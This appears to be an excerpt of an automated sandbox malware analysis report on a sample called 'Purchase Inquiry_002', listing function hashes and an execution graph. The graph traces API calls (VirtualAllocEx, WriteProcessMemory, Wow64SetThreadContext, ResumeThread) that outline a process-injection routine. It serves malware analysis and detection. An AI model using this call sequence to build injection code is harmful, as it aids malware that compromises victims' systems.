                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9031666b67aa663d4b203dc20b695b35c41820ef91ae1356e454393c16813c0b
                                • Instruction ID: 9d39c5c66a3f400784531c272ec44532c50667c4a87c77a4c0281fb984688420
                                • Opcode Fuzzy Hash: 9031666b67aa663d4b203dc20b695b35c41820ef91ae1356e454393c16813c0b
                                • Instruction Fuzzy Hash: 26E030767001145F5314966AD884D6BB7EDEBCC6603118079E908C7311D9319C0186A0
                                Function 06D88558 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6b6e9f64c5a7ee851d70b4dbe30344586ec1670d2ad4bba3b207ed9a37378cd4
                                • Instruction ID: b011b593517eb653b2d7d9b0f7c81f769652c79b1affb05a24406f021cdc5957
                                • Opcode Fuzzy Hash: 6b6e9f64c5a7ee851d70b4dbe30344586ec1670d2ad4bba3b207ed9a37378cd4
                                • Instruction Fuzzy Hash: 77F0B7B4D14208DFDB80EFA9D8456BDBBF8EB48300F5089AAD419E3200E7709A40DB80
                                Function 06D83D30 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 16c89f05b4857240a334e9fce7aa2e326ac3fee9026385f4d65ca1bf4be6a8a9
                                • Instruction ID: caaaff98db5249cdd783291998cf57250f8629aef47e2405d60eb02bc6a3eded
                                • Opcode Fuzzy Hash: 16c89f05b4857240a334e9fce7aa2e326ac3fee9026385f4d65ca1bf4be6a8a9
                                • Instruction Fuzzy Hash: 51F0DAB4D14208EFDB80EFF9D5456ADBBF8EB48700F0199AAD818E3310E7705640CB40
                                Function 06D883E8 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4a315f5221547be698d74936b7370e81a36b976103fac20c17708fdfd6c5b131
                                • Instruction ID: f212d4c977380dd9eea3f4a490c98fc59221a181dd00e2dc22071f71e3ec0175
                                • Opcode Fuzzy Hash: 4a315f5221547be698d74936b7370e81a36b976103fac20c17708fdfd6c5b131
                                • Instruction Fuzzy Hash: DAF0D0B1D042099FDB44DFA9C84566EBBF5FB4C200F50455AD918E7201D7759505CB91
                                Function 06D8E6C0 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a91968a9ececec8e03215fa0d41492c62ea3ea2f1ae55a14ce8ca2cf869b30bd
                                • Instruction ID: bd9fa2f61f5276838f3bbb06c4c570dcc8167a5e08d06c4f2698badfc9bf0144
                                • Opcode Fuzzy Hash: a91968a9ececec8e03215fa0d41492c62ea3ea2f1ae55a14ce8ca2cf869b30bd
                                • Instruction Fuzzy Hash: 8FF0E570904249CFEB90BBAAE80C7A9BBBD9BC9300F00D465941656381DEB49805CFA2
                                Function 06D88688 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6859b549275eda47ef142d17834271b826ac79f4d281957df9595518360e96a8
                                • Instruction ID: dbbcf312f90588a52e36318caba34bf17ea1140c203f299f78a847967fe7db88
                                • Opcode Fuzzy Hash: 6859b549275eda47ef142d17834271b826ac79f4d281957df9595518360e96a8
                                • Instruction Fuzzy Hash: 21F0ED74D24208EFCB90EFB8D54A6ADBFF8EB09300F5085A9D449E3200E7749A50DF80
                                Function 06D88380 Relevance: .0, Instructions: 24COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c70c99c4e09027c655013b890b2f9938261e750c7cd534f9ca34231b3ef6ded
                                • Instruction ID: ef0466b02d167f88da036e94f46ead4c4a23196653391e081a20dbb782cd1345
                                • Opcode Fuzzy Hash: 5c70c99c4e09027c655013b890b2f9938261e750c7cd534f9ca34231b3ef6ded
                                • Instruction Fuzzy Hash: 05E0D870940206EFD310CF79C90AECA7FF2AB04314FA4C694E435CB6A2D73989028F90
                                Function 06D85FBD Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 69d5ddb3f276bd75f68bc62d5814f57a811c260f23ceb3953edf016052be12d0
                                • Instruction ID: f3765bca391443aed86644fdc18c862f75f86f3eb2a5f0dc707b015156266d6a
                                • Opcode Fuzzy Hash: 69d5ddb3f276bd75f68bc62d5814f57a811c260f23ceb3953edf016052be12d0
                                • Instruction Fuzzy Hash: 08E08C76C010249B8B10ABA4AA065EFFE35AB04610B404412A815A7A00D3300675CBD1
                                Function 06D84E90 Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e379b4a446b203ba9316f2e4ebb24f774af1c7b7b0605ba8530a284b05035694
                                • Instruction ID: 932da8f22ae713cb36fd43dd79110e8cceb318cc0b96f268dfe9c748411ddc1d
                                • Opcode Fuzzy Hash: e379b4a446b203ba9316f2e4ebb24f774af1c7b7b0605ba8530a284b05035694
                                • Instruction Fuzzy Hash: C3E08230801209AFCB81FFA4D8086AEBBF8EB05200F5245A8D809A3240EB704A48DB92
                                Function 06D88390 Relevance: .0, Instructions: 18COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80b465bc1d6c212b06fbe5e1c179164d46ec5c03971f5d2917c8fd8ec2a85df8
                                • Instruction ID: ac0eb712d0c8fea4fb1e3088de941b18d9c4e06ee17468609345acc76b8dcb68
                                • Opcode Fuzzy Hash: 80b465bc1d6c212b06fbe5e1c179164d46ec5c03971f5d2917c8fd8ec2a85df8
                                • Instruction Fuzzy Hash: 8BE0B6B0D4420AEFD780EFB9CA09A5EBBF1BF08200F5185A9D019E7251E7B49A04DF91
                                Function 06D855D0 Relevance: .0, Instructions: 17COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a1ff2969b2516cc10a43d5c203575061c94ca2b7ed5d214ed69cd9cdf81fdf25
                                • Instruction ID: 27538c1c0e917c0b0d33f929a1f42a9b4ddb12a9893079f318b2633037507258
                                • Opcode Fuzzy Hash: a1ff2969b2516cc10a43d5c203575061c94ca2b7ed5d214ed69cd9cdf81fdf25
                                • Instruction Fuzzy Hash: 95D012750561802EE38276118C1ECF23F6DDB6314474584D3E880C94B2890449259B75
                                Function 06D85FC8 Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                • Instruction ID: e02715d18e688a1892092ab0d202e2642f24cca7c7d57653f56bc025f6609dfd
                                • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                • Instruction Fuzzy Hash: CED09272D00139AB8B10AFE9EC098EFFF79EF19A50B418126E955AB100E3715A21DBD1
                                Function 06D8A6BC Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c190058bf93d816394f22bb1e9fbf55b27b7062a5cf89f2915158dabbd9d3358
                                • Instruction ID: e6f4487e8f8d4b7819e62541ffa84e3581dcd92d28e8623c841b7502a34764dd
                                • Opcode Fuzzy Hash: c190058bf93d816394f22bb1e9fbf55b27b7062a5cf89f2915158dabbd9d3358
                                • Instruction Fuzzy Hash: C4D05E3091520CCFDB50DB00E8407D8B77AFB85210F0091D9E04D93200CB701E998F51
                                Function 06D88488 Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7814ace514b199e45e8eec5b6e2b329a69128980ced6b1bd769db61aba5c78b
                                • Instruction ID: a213f3414d282b06fdccc5a2a4940dc8a344b3fd137f81198189ea19ab38a184
                                • Opcode Fuzzy Hash: b7814ace514b199e45e8eec5b6e2b329a69128980ced6b1bd769db61aba5c78b
                                • Instruction Fuzzy Hash: 0FD012371101089E4BC0FFD5EC44C5777DDFB587007408422E504CB130E621E424E7A1
                                Function 06D8A420 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d2cc3ff881f3c1720f13435a5a311905a5d8307de4106acfec270ff966a5796
                                • Instruction ID: 28d304f1d5413e20e9e98597b8659878d601d72e4e71f67711a030f3f0bd4414
                                • Opcode Fuzzy Hash: 7d2cc3ff881f3c1720f13435a5a311905a5d8307de4106acfec270ff966a5796
                                • Instruction Fuzzy Hash: ACD0A9310093898FD322AB66B40DA207F787B0A202F0850AAE189CA063DEE84824CB02
                                Function 06D8A430 Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6b9459feb87abe7204e3621c196669d48423a4c2a907bc87153e4e99317fb99
                                • Instruction ID: a7699ccff2a8f61d1fbe797daf7c194697f32bcca3f065387e27143aa18d9e93
                                • Opcode Fuzzy Hash: c6b9459feb87abe7204e3621c196669d48423a4c2a907bc87153e4e99317fb99
                                • Instruction Fuzzy Hash: 96C08C3101120D8BC2603B9BF40EB247BBC7B40302F405025F10D454108FB00410CE5A
                                Function 06D87029 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd3becf35ed56c796f894449ee43cfb96dca9f55373f0da8b8bc207839d6e11d
                                • Instruction ID: e26ab6739bdcef9e311ac9966037f17ba2af954704a0e527aa2dd61833c532cc
                                • Opcode Fuzzy Hash: bd3becf35ed56c796f894449ee43cfb96dca9f55373f0da8b8bc207839d6e11d
                                • Instruction Fuzzy Hash: 73A012F356000066A084B0208C42AA50E0882F13143544001662110481C64042218073
                                Function 06D858E4 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd88c61682c2dc19254b806646a2803c59d3ae587eb839795b0f5fb2cbf74697
                                • Instruction ID: 46cb1855d7fed52feea765c20026f8d8bdfca8d105f685bd9673a9c50aa346ea
                                • Opcode Fuzzy Hash: bd88c61682c2dc19254b806646a2803c59d3ae587eb839795b0f5fb2cbf74697
                                • Instruction Fuzzy Hash: C2B012B9169200BFA1D073F45C99B2FD831EBB2B50BA0CC0532A90100085E18464D37B

                                Non-executed Functions

                                Function 06D8FB80 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: a#k;
                                • API String ID: 0-2950163595
                                • Opcode ID: 688edb9fc82dfac584e5663620bd4c3e983e46c806487062678694c11cb443be
                                • Instruction ID: c419e23967347f9156ecba12830c4aefa361a5b6bd881d5cccc3d87d8101b919
                                • Opcode Fuzzy Hash: 688edb9fc82dfac584e5663620bd4c3e983e46c806487062678694c11cb443be
                                • Instruction Fuzzy Hash: F3E1F974E002198FDB54DFA9C584AAEFBF2FF89304F248169E415AB355D730A942CF61
                                Function 06D905D8 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8bfd4b553edba7f933a33ba3e82fe2ea2e9dac24fda906f7a8bc398eb3dfdee6
                                • Instruction ID: ada59e8081867b3fc85a69c250d3cc8e90cc9b09735868b230e691378ea37087
                                • Opcode Fuzzy Hash: 8bfd4b553edba7f933a33ba3e82fe2ea2e9dac24fda906f7a8bc398eb3dfdee6
                                • Instruction Fuzzy Hash: 87E1FA74E002198FDB54DFA9D580AAEFBF2BF89304F248169E455AB355D730AD81CFA0
                                Function 06D8F748 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c7330ecd09637a5d7bb7205b9f0792b142bda3fe4cac8ccbf01cd91b7c6af1a
                                • Instruction ID: 1c95a16bad1b42b2cb807a11c5c2bb7c57ff22971179eceb7ccafb7e5ab5b135
                                • Opcode Fuzzy Hash: 1c7330ecd09637a5d7bb7205b9f0792b142bda3fe4cac8ccbf01cd91b7c6af1a
                                • Instruction Fuzzy Hash: 81E1FBB4E002198FDB54DFA9C584AAEFBF2FF89304F248169E455AB355D730A941CFA0
                                Function 06D8F310 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d49e6b8c3d4603e40d6e55fcce154ce2360ccdcb839829dc3d836ed815f1410f
                                • Instruction ID: 471221ccb427f6e7c68e5ca9a60d616438cc88274a5ff397be52c2659c2f65a5
                                • Opcode Fuzzy Hash: d49e6b8c3d4603e40d6e55fcce154ce2360ccdcb839829dc3d836ed815f1410f
                                • Instruction Fuzzy Hash: 51E10B74E002198FDB54DFA9C584AAEFBF2FF89304F2481A9E455AB355D7309942CFA0
                                Function 06D86669 Relevance: .3, Instructions: 287COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 241e0937800b21eb9ff3837ac31a36ae1ca56d225ac564875a1a98e1cb441ba8
                                • Instruction ID: fdb813cb8ae551ca52cf2af356b62df0edcccdde50ed1e1966013a6a72e6dd7b
                                • Opcode Fuzzy Hash: 241e0937800b21eb9ff3837ac31a36ae1ca56d225ac564875a1a98e1cb441ba8
                                • Instruction Fuzzy Hash: B1E1E735D21A5ACACB10EB64D990A9DB7B1FF95300F60CB9AD04937214EF706AD4CF91
                                Function 0281D57C Relevance: .3, Instructions: 264COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01b5e00aeba0deadf8d10ea9c8aaff7016d0330944d003048b680aa29b1b193c
                                • Instruction ID: fb8acf763f7cfa4d8672ec19c9f3301b8b98e06ccd71205e5ffd01e9cca376ea
                                • Opcode Fuzzy Hash: 01b5e00aeba0deadf8d10ea9c8aaff7016d0330944d003048b680aa29b1b193c
                                • Instruction Fuzzy Hash: 95A15C3AE003198FCF05DFA8C84059EB7BAFF95304B15856AE905EB2A1DB71E946CB40
                                Function 06D86678 Relevance: .3, Instructions: 264COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f09ebac308b4db2198e43d92afb8aa5bece906db60d502ac8e8741e06c68666a
                                • Instruction ID: 707820e9957bacfb3f4c44195a8c92dd10f2562be6776212b8c898318155daca
                                • Opcode Fuzzy Hash: f09ebac308b4db2198e43d92afb8aa5bece906db60d502ac8e8741e06c68666a
                                • Instruction Fuzzy Hash: F8D1C735D21A5ACACB10EB64D990A99B7B1FF95300F60CB9AD04A37214FF706AD4CF51
                                Function 06D8B606 Relevance: .1, Instructions: 108COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea6a3bc50f1f0e9ef2186d07a297ed1b6c008c2fe99ea912a16fd47b0d60b77c
                                • Instruction ID: 690d02b4155e6564c4848c4e128cf59d9bf496d63a6143bdf5d317e4da211af4
                                • Opcode Fuzzy Hash: ea6a3bc50f1f0e9ef2186d07a297ed1b6c008c2fe99ea912a16fd47b0d60b77c
                                • Instruction Fuzzy Hash: 7741E674D04208CFDB48DFAAD8496AEBBF6EB8D301F14D06AE459AB251DB344941CF94
                                Function 06D834A8 Relevance: .1, Instructions: 107COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbbb68d6728b3c01ce3e250d8755605ab4c5d59bec9f4f6a9c8fae53557e5cbc
                                • Instruction ID: 12bd1ffeb4027a0d8c9b15a16a4fd56cd5009a2a5c57974bae43082ff29e6c4f
                                • Opcode Fuzzy Hash: cbbb68d6728b3c01ce3e250d8755605ab4c5d59bec9f4f6a9c8fae53557e5cbc
                                • Instruction Fuzzy Hash: 3641B9B1E016189FEB68DF6AC8447DABAF3AFC9200F15C1A9D40CA7254EB309981CF51

                                Execution Graph

                                Execution Coverage:10.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:199
                                Total number of Limit Nodes:6
                                execution_graph 29707 7424580 29708 742470b 29707->29708 29709 74245a6 29707->29709 29709->29708 29712 7424800 PostMessageW 29709->29712 29714 74247f8 29709->29714 29713 742486c 29712->29713 29713->29709 29715 7424800 PostMessageW 29714->29715 29716 742486c 29715->29716 29716->29709 29731 13e4668 29732 13e467a 29731->29732 29733 13e4686 29732->29733 29735 13e4779 29732->29735 29736 13e477c 29735->29736 29740 13e4888 29736->29740 29744 13e4879 29736->29744 29741 13e488a 29740->29741 29742 13e498c 29741->29742 29748 13e44b4 29741->29748 29742->29742 29745 13e487c 29744->29745 29746 13e498c 29745->29746 29747 13e44b4 CreateActCtxA 29745->29747 29747->29746 29749 13e5918 CreateActCtxA 29748->29749 29751 13e59db 29749->29751 29752 742181a 29753 7421804 29752->29753 29754 7421814 29752->29754 29753->29754 29758 74233f6 29753->29758 29779 7423398 29753->29779 29799 7423388 29753->29799 29759 7423384 29758->29759 29761 74233f9 29758->29761 29760 74233d6 29759->29760 29819 7423a42 29759->29819 29824 7423d3f 29759->29824 29829 7423939 29759->29829 29834 7423af9 29759->29834 29839 7423d78 29759->29839 29844 7423b5a 29759->29844 29849 7423a75 29759->29849 29854 7423895 29759->29854 29859 7423cb4 29759->29859 29864 7423797 29759->29864 29868 7423856 29759->29868 29872 7423810 29759->29872 29877 7423eb0 29759->29877 29882 74237ec 29759->29882 29887 7423a04 29759->29887 29891 7423961 29759->29891 29896 7423823 29759->29896 29760->29754 29761->29754 29780 74233b2 29779->29780 29781 7423a42 2 API calls 29780->29781 29782 7423823 2 API calls 29780->29782 29783 7423961 2 API calls 29780->29783 29784 7423a04 2 API calls 29780->29784 29785 74233d6 29780->29785 29786 74237ec 2 API calls 29780->29786 29787 7423eb0 2 API calls 29780->29787 29788 7423810 2 API calls 29780->29788 29789 7423856 2 API calls 29780->29789 29790 7423797 2 API calls 29780->29790 29791 7423cb4 2 API calls 29780->29791 29792 7423895 2 API calls 29780->29792 29793 7423a75 2 API calls 29780->29793 29794 7423b5a 2 API calls 29780->29794 29795 7423d78 2 API calls 29780->29795 29796 7423af9 2 API calls 29780->29796 29797 7423939 2 API calls 29780->29797 29798 7423d3f 2 API calls 29780->29798 29781->29785 29782->29785 29783->29785 29784->29785 29785->29754 29786->29785 29787->29785 29788->29785 29789->29785 29790->29785 29791->29785 29792->29785 29793->29785 29794->29785 29795->29785 29796->29785 29797->29785 29798->29785 29800 7423398 29799->29800 29801 7423a42 2 API calls 29800->29801 29802 7423823 2 API calls 29800->29802 29803 7423961 2 API calls 29800->29803 29804 7423a04 2 API calls 29800->29804 29805 74233d6 29800->29805 29806 74237ec 2 API calls 29800->29806 29807 7423eb0 2 API calls 29800->29807 29808 7423810 2 API calls 29800->29808 29809 7423856 2 API calls 29800->29809 29810 7423797 2 API calls 29800->29810 29811 7423cb4 2 API calls 29800->29811 29812 7423895 2 API calls 29800->29812 29813 7423a75 2 API calls 29800->29813 29814 7423b5a 2 API calls 29800->29814 29815 7423d78 2 API calls 29800->29815 29816 7423af9 2 API calls 29800->29816 29817 7423939 2 API calls 29800->29817 29818 7423d3f 2 API calls 29800->29818 29801->29805 29802->29805 29803->29805 29804->29805 29805->29754 29806->29805 29807->29805 29808->29805 29809->29805 29810->29805 29811->29805 29812->29805 29813->29805 29814->29805 29815->29805 29816->29805 29817->29805 29818->29805 29820 74237f8 29819->29820 29901 7421040 29820->29901 29905 7421048 29820->29905 29821 74239da 29821->29760 29825 7424078 29824->29825 29909 7420eb0 29825->29909 29913 7420ea8 29825->29913 29826 7424093 29830 7423943 29829->29830 29917 7420e00 29830->29917 29921 7420df9 29830->29921 29831 7423c7f 29831->29760 29835 7423b06 29834->29835 29837 7421040 WriteProcessMemory 29835->29837 29838 7421048 WriteProcessMemory 29835->29838 29836 7423dc6 29837->29836 29838->29836 29840 7423d8d 29839->29840 29842 7421040 WriteProcessMemory 29840->29842 29843 7421048 WriteProcessMemory 29840->29843 29841 7423dc6 29842->29841 29843->29841 29845 7423b60 29844->29845 29925 7420f80 29845->29925 29929 7420f88 29845->29929 29846 7424023 29846->29760 29850 74237f8 29849->29850 29852 7421040 WriteProcessMemory 29850->29852 29853 7421048 WriteProcessMemory 29850->29853 29851 74239da 29851->29760 29852->29851 29853->29851 29855 74238a5 29854->29855 29857 7421040 WriteProcessMemory 29855->29857 29858 7421048 WriteProcessMemory 29855->29858 29856 7423f26 29857->29856 29858->29856 29861 7423b71 29859->29861 29860 7423df2 29860->29760 29861->29860 29862 7420f80 VirtualAllocEx 29861->29862 29863 7420f88 VirtualAllocEx 29861->29863 29862->29860 29863->29860 29933 74212d0 29864->29933 29937 74212c5 29864->29937 29870 7420eb0 Wow64SetThreadContext 29868->29870 29871 7420ea8 Wow64SetThreadContext 29868->29871 29869 7423875 29870->29869 29871->29869 29873 742381d 29872->29873 29875 7420e00 ResumeThread 29873->29875 29876 7420df9 ResumeThread 29873->29876 29874 7423c7f 29874->29760 29875->29874 29876->29874 29878 7423eb4 29877->29878 29880 7421040 WriteProcessMemory 29878->29880 29881 7421048 WriteProcessMemory 29878->29881 29879 74239da 29879->29760 29880->29879 29881->29879 29883 74237f8 29882->29883 29885 7421040 WriteProcessMemory 29883->29885 29886 7421048 WriteProcessMemory 29883->29886 29884 74239da 29884->29760 29885->29884 29886->29884 29941 7421131 29887->29941 29945 7421138 29887->29945 29888 7423a26 29888->29760 29892 74237f8 29891->29892 29894 7421040 WriteProcessMemory 29892->29894 29895 7421048 WriteProcessMemory 29892->29895 29893 74239da 29893->29760 29894->29893 29895->29893 29897 7423830 29896->29897 29899 7420e00 ResumeThread 29897->29899 29900 7420df9 ResumeThread 29897->29900 29898 7423c7f 29898->29760 29899->29898 29900->29898 29902 7421048 WriteProcessMemory 29901->29902 29904 74210e7 29902->29904 29904->29821 29906 7421090 WriteProcessMemory 29905->29906 29908 74210e7 29906->29908 29908->29821 29910 7420ef5 Wow64SetThreadContext 29909->29910 29912 7420f3d 